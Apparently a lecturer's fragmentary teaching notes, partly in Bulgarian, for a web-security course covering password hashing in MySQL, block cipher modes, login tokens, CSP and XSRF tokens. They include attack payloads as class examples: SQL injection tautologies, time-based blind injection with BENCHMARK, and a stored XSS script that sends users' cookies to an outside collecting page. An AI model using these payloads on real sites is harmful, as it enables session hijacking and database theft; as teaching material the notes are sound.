﻿philip@abv.bg
0893 690 135
https://www.cphpvb.net

LAMP - Linux Apache MySQL PHP

127.0.0.1 - localhost : 8080

BGP




GET /forum/index.php HTTP/1.1
Host: www.alphaforum.net

Connection: close


GET /forum/
Host: www.alphaforum.net


www.alphaforum.net.


.net.alphaforum.www

.net TLD - top level domain
.net.alphaforum - domain
.net.alphaforum.www - subdomain

DNS queries
DNSSec 

REQUEST URI
/forum/style.php?id=31&lang=bg&sid=c62f75...

https://nm.abv.bg/

http:// - protocol
bg
abv.bg
nm.abv.bg
/Mail.html



Apache

http://localhost/test.html


SUPRESS WARNINGS

Exception Handler

$_GET $_POST


http://localhost/test.php?var=value

http://localhost/test.php?password=array(...)




GET /test.php HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: en-US,en;q=0.7,bg;q=0.3
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: localhost.
Connection: close



SESSION HIJACKING


AES128, AES256

Симетрично криптиране

Асиметрично криптиране


amIunique.org





index.php -> login.php -> securearea.php
          <-


Zend 

GRANT

CREATE DATABASE osup2019;

USE osup2019;

DROP TABLE users;

CREATE TABLE users(
	id BIGINT UNSIGNED AUTO_INCREMENT PRIMARY KEY,
	user VARCHAR(64) NOT NULL UNIQUE,
	pass BINARY(32) NOT NULL,
	salt BINARY(16) NOT NULL
)ENGINE="InnoDB";

INSERT INTO users(user, salt, pass) VALUE
("ivan", 
UNHEX(SUBSTRING(SHA2(RAND(),256),1,32)),
UNHEX(SHA2(CONCAT(SHA2("jgiufjhswtigu43hg85gjfdsigpassword",256), HEX(salt)),256))),
("petar", 
UNHEX(SUBSTRING(SHA2(RAND(),256),1,32)),
UNHEX(SHA2(CONCAT(SHA2("jgiufjhswtigu43hg85gjfdsig123456",256), HEX(salt)),256))),
("maria", 
UNHEX(SUBSTRING(SHA2(RAND(),256),1,32)),
UNHEX(SHA2(CONCAT(SHA2("jgiufjhswtigu43hg85gjfdsig123456",256), HEX(salt)),256)));

// with KEY STRETCHING

INSERT INTO users(user, salt, pass) VALUE
("ivan", 
UNHEX(SUBSTRING(SHA2(RAND(),256),1,32)),
UNHEX(SHA2(CONCAT("1a643d387df8ddb16ed5581e931713f23cd81ddbfa0ab426bb6cf674f333a230", HEX(salt)),256)));



GRANT SELECT 
ON osup2019.users
TO login@localhost
IDENTIFIED BY "bmijgfsjgi54w";


f(x) = x%10;

8


UPDATE users
SET pass = SHA2(pass,256);

Sha256(password) = 5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8

Sha256(passworD) = 9e78de733c6a51c0cc954c1d956d8929ad1310513e1042d81edc375219c6a2ef








PBKDF2(pass, hash_algo, salt, 1000)
BCrypt


Scrypt


GRANT ALL ON osup2019.users
TO register_complete@localhost
IDENTIFIED BY 'fkdsigjfdhg';

SQL INJECTION



ivan'=user OR '2


INSERT INTO users(user, salt, pass, realname) VALUES 
( '' AND IF(VERSION()='10.1.36-MariaDB',BENCHMARK(10000000, MD5(CHAR(1)))=0,FALSE),
 UNHEX(SUBSTRING(SHA2(RAND(),256),1,32)), 
 UNHEX( SHA2( CONCAT("f5775fd081a12efafd2d07dff248a3f96adaaccdeb18778963adab6f94380ce3", HEX(salt)) ,256)), 
 "Maria Ivanova" );


" AND IF(ASCII(SUBSTRING((SELECT DISTINCT table_name FROM information_schema.columns ORDER BY BINARY(table_name) DESC LIMIT 1,2),1,1))>130,BENCHMARK(100000000, MD5(CHAR(1)))=0,FALSE) OR '1'="2


SELECT column_name
FROM information_schema.columns
WHERE table_name = ( SELECT DISTINCT table_name
					 FROM information_schema.columns
					 ORDER BY BINARY(table_name) DESC
					 LIMIT 1
				    );

https://cve.mitre.org

DoS Regex (ReDoS)


((a-z)*)*

Параметризирани заявки

SELECT * FROM users;

1. Компилация
2. Изпълнение

PREPARE SELECT * FROM users
		WHERE user=? AND pass=?
AS prepared_stmt;

EXECUTE prepared_stmt USING @var1, @var2;

PDO


0. Без проверки за нищо
1. Динамични заявки с филтриране
2. Параметризирани заявки
3. Проверка за допустими символи
4. Комбинация от 1 и 3
5. Комбинация от 2 и 3







               /
http://site.dom/forum/
http://site.dom/chat/

...

/chat/...

http://subdomain1.site.dom/
http://subdomain2.site.dom/



...://


Блокови

aes128
aes256
DES, 3DES, Blowfish, ...

Режими

Electronic CodeBook (ECB) - ДА НЕ СЕ ИЗПОЛЗВА!!!

блок1, блок2, блок3, ...

Криптираме:
шифър_1 = crypt(блок_1, KEY)
шифър_i = crypt(блок_i, KEY)

Декриптиране
блок_1 = decrypt(шифър_1, KEY)
блок_i = decrypt(шифър_i, KEY)


GET /index.php HTTP 1.1
...



Cipher-Block Chaining (CBC) - всеки следващ блок да зависи от предишния

Криптираме:
шифър_1 = crypt(блок_1, KEY) XOR IV
шифър_i = crypt(блок_i, KEY) XOR шифър_i-1

Декриптиране:
блок_1 = decrypt(шифър_1, KEY) XOR IV
блок_i = decrypt(шифър_i, KEY) XOR шифър_i-1

Свойства:
1. Криптирането е линейно
2. Декриптиране НЕ е линейно - може да се разпаралелява
3. Padding 
4. Загуба на бит? - засяга текущия и следващия блок


Ако има два различни шифъра - например шифър_i и шифър_j - които
са идентични, то:

шифър_i-1 XOR блок_i = шифър_j-1 XOR блок_j

=>

шифър_i-1 XOR шифър_j-1 = блок_i XOR блок_j

GET /index.php HTTP 1.1
...

https://sweet32.info

TLS 1.0, 1.1?

https://defuse.ca/cbcmodeiv.htm

Chosen Plaintext Attacks

TLS 1.0 -> за IV на следващо съобщение се използва последния
шифър на предишното съобщение

TLS 1.3 - CBC няма да се използва въобще!




Segment Integer Counter

Nounce - Number used once - произволно число с голяма ентропия

Криптиране:
шифър_1 = crypt(nounce + 1, KEY) XOR блок_1
шифър_i = crypt(nounce + i, KEY) XOR блок_i

Криптиране:
шифър_1 = crypt(nounce + 1, KEY) XOR шифър_1
шифър_i = crypt(nounce + i, KEY) XOR шифър_i

Свойства:
1. Криптирането НЕ е линейно
2. Декриптиране НЕ е линейно
3. Без padding 
4. Загуба на бит? - засяга текущия блок


Propagated Cipher-Block Chaining (pcbc)

Криптираме:
шифър_1 = crypt(блок_1, KEY) XOR IV
шифър_i = crypt(блок_i, KEY) XOR шифър_i-1 XOR блок_i-1

Декриптиране:
блок_1 = decrypt(шифър_1, KEY) XOR IV
блок_i = decrypt(шифър_i, KEY) XOR шифър_i-1 XOR блок_i-1

Свойства:
1. Криптирането е линейно
2. Декриптиране е линейно
3. Padding 
4. Загуба на бит? - засяга текущ блок и всички следващи


Output Feedblack (OFB)

Криптиране:
K_1 = crypt(IV, KEY)
K_i = crypt(K_i-1, KEY)
шифър_1 = K1 XOR блок_1
шифър_i = crypt(K_i-1, KEY) XOR блок_i

Декриптиране
K_1 = crypt(IV, KEY)
K_i = crypt(K_i-1, KEY)
блок_1 = K1 XOR шифър_1
блок_i = crypt(K_i-1, KEY) XOR шифър_i

Свойства:
1. Криптирането е линейно
2. Декриптиране е линейно
3. Без padding 
4. Загуба на бит? - засяга текущия блок



Cipher feedback (CFB)

Криптираме:
шифър_1 = crypt(IV, KEY) XOR блок_1
шифър_i = crypt(шифър_i-1, KEY) XOR блок_i

Декриптиране:
блок_1 = crypt(IV, KEY) XOR шифър_1
блок_i = crypt(шифър_i-1, KEY) XOR шифър_i

Свойства:
1. Криптирането е линейно
2. Декриптиране НЕ е линейно - може да се разпаралелява
3. Няма нужда от padding
4. Загуба на бит? - засяга текущия и всички следващи



BIT FLIPPERING ATTACK

HMAC


Login Token


CREATE TABLE users_tokens(
	uid BIGINT UNSIGNED NOT NULL,
	token BINARY(32) NOT NULL,
	FOREIGN KEY (uid) REFERENCES users(id)
);




ALTER TABLE users_tokens
ADD permanent_token BINARY(32) NOT NULL;


SELECT users_tokens.uid, HEX(users_tokens.token) AS token 
FROM users_tokens 
JOIN users ON users.id = users_tokens.uid 
WHERE HEX(users_tokens.permanent_token) = 'b6abee167414541749d2fe8af3445ca68c069eb182cdef707251ee18ae0cf863' AND users.user = 'ivan'


TODO: TIMESTAMP за users_tokens + тригер за ежедневно почистване


ALTER TABLE users_tokens
ADD created_on DATETIME NULL DEFAULT NULL;



CREATE EVENT old_tokens_cleanup
ON SCHEDULE EVERY 1 HOUR
DO DELETE FROM users_tokens
   WHERE created_on < NOW() - INTERVAL 1 HOUR;




CREATE TABLE articles(
	id INT UNSIGNED AUTO_INCREMENT PRIMARY KEY,
	title VARCHAR(255) NOT NULL,
	content TEXT NOT NULL
);


INSERT INTO articles(title, content) VALUES
("Article A", "jgfidghf gfds gfds gfds gfds"),
("Article B", "gfd gfd gfd grfd"),
("Article C", "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa");



GRANT ALL ON osup2019.*
TO myuser@localhost
IDENTIFIED BY "gvfdgfdgfd";

<a href="articles.php?id=" 1="">Article A</a>


http://localhost/articles.php?id=


1%20AND%201=2


1 AND 1=2

ASCII(...)


CREATE TABLE chatmessages(
	uid BIGINT UNSIGNED NOT NULL,
	message VARCHAR(255) NOT NULL,
	on_datetime DATETIME NOT NULL,
	PRIMARY KEY(uid, on_datetime),
	FOREIGN KEY (uid) REFERENCES users(id)
);


aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa




XSS - Cross Site Scripting

Stored
Dynamic
DOM



https://www.cphpvb.net/hack.php?c=test


<img id="1" src=""/><script>document.getElementById(1).src="https://www.cphpvb.net/hack.php?c="+document.cookie</script>

ivan: 
<img id="1" src="https://www.cphpvb.net/hack.php?c=PHPSESSID=q95rg0jloo4mt6usdffn6dkd86">
<script>document.getElementById(1).src="https://www.cphpvb.net/hack.php?c="+document.cookie</script>
<br>2019-04-15 10:57:26 ivan: 


OWASP

STORED XSS
Dynamic XSS


http://localhost/articles.php?id=3%3Cscript%3Ealert(1)%3C/script%3E


validator.w3.org


Sources and Sinks



localhost/dom.php#<script>alert(1)</script>



https://nm.abv.bg/Mail.html#history

Sources:
1. GET
2. POST
3. Headers



BOM



mysite.dom
googleanalitycs


?var=<script src="http://thehackersite.com/script.js"></script>
?var=<script>...</script>


 $headers['Content-Security-Policy'] = 
 "default-src 'self';
 script-src 'self' cdn.mathjax.org;
 style-src 'self' 'unsafe-inline';
 font-src 'self' about:;
 object-src 'self' www.vbox7.com www.youtube.com;
 frame-src 'self' www.vbox7.com www.youtube.com;
 frame-ancestors 'none';
 base-uri 'self';";
  }



XSRF - Cross Site Request Forgery

Same Origin Policy - OK


HTTPS -> HTTP

<iframe src="javascript:"></iframe>

HTTP_ORIGIN

TLS BREACH ATTACK 

gzip

<input type="hidden" name="dynamicxsrftoken" value="Dv12cqCl+8a2RZDfd48h+JoqUGi1" />
<input type="hidden" name="token_mix" value="ce327b547da4f4e528a244bceec39b61cb731b00248280e38b2a5e2dc218f816" />

<input type="hidden" name="dynamicxsrftoken" value="V6iGrP6H2BTR9XvcUiKt//t/0rWG" />
<input type="hidden" name="token_mix" value="842aa30225a988eaace9383befd06d201f4f2ffbf6463aac600f0a70669bc951" />
<input type="text" name="message" />


http://localhost./logout.php?dt=373pGuIu0ySaRMGUSyszJIs8qmvH&tm=617ee51efe4e118befa6be002b56ade068655f931f3f19f749193de151690897









